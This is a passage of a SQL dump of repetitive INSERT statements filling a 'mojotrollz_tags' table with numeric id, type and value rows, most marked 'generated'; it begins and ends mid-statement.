`type`, `value`, `comment`) VALUES (8305, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8306, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8306, 1, 2, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8306, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8306, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8306, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8307, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8307, 1, 2, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8307, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8307, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8307, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8308, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8308, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8309, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8309, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8310, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8310, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8311, 1, 1, 109, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8311, 1, 2, 1477, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8311, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8317, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8318, 1, 1, 109, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8318, 1, 2, 1477, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8318, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8319, 1, 1, 109, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8319, 1, 2, 1477, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8319, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8320, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8320, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8324, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8336, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8337, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8338, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8356, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8356, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8357, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8357, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8358, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8358, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8359, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8359, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8360, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8360, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8361, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8361, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8362, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8362, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8363, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8363, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8364, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8364, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8376, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8378, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8378, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8379, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8379, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8380, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8380, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8381, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8381, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8382, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8382, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8383, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8383, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8384, 1, 1, 109, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8384, 1, 2, 1477, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8384, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8385, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8385, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8386, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8386, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8387, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8388, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8389, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8390, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8390, 1, 2, 1497, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8390, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8390, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8390, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8391, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8392, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8393, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8393, 1, 2, 1497, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8393, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8393, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8393, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8394, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8395, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8395, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8396, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8396, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8397, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8397, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8398, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8398, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8399, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8399, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8400, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8400, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8401, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8401, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8402, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8402, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8403, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8403, 1, 2, 1497, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8403, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8403, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8403, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8404, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8404, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8404, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8404, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8404, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8404, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8405, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8405, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8408, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8408, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8409, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8409, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8416, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8416, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8417, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8417, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8418, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8418, 1, 2, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8418, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8418, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8418, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8419, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8419, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8420, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8420, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8421, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8436, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8436, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8437, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8438, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8439, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8439, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8440, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8441, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8441, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8442, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8442, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8443, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8444, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8444, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8446, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8447, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8447, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8477, 1, 1, 329, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8477, 1, 2, 2017, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8477, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8478, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8479, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8479, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8480, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8496, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8496, 1, 2, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8496, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8496, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8496, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8497, 1, 1, 109, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8497, 1, 2, 1477, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8497, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8503, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8503, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8504, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8505, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8506, 1, 1, 369, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8506, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8507, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8507, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8508, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8508, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8509, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8509, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8510, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8516, 1, 1, 129, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8516, 1, 2, 722, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8516, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8517, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8517, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8518, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8518, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8519, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8519, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8520, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8520, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8521, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8521, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8522, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8522, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8523, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8523, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8524, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8524, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8525, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8525, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8526, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8526, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8527, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8527, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8528, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8528, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8529, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8529, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8530, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8530, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8531, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8531, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8532, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8532, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8534, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8534, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8535, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8535, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8538, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8538, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8539, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8539, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8540, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8540, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8541, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8541, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8542, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8542, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8543, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8543, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8544, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8544, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8545, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8545, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8546, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8546, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8547, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8547, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8548, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, 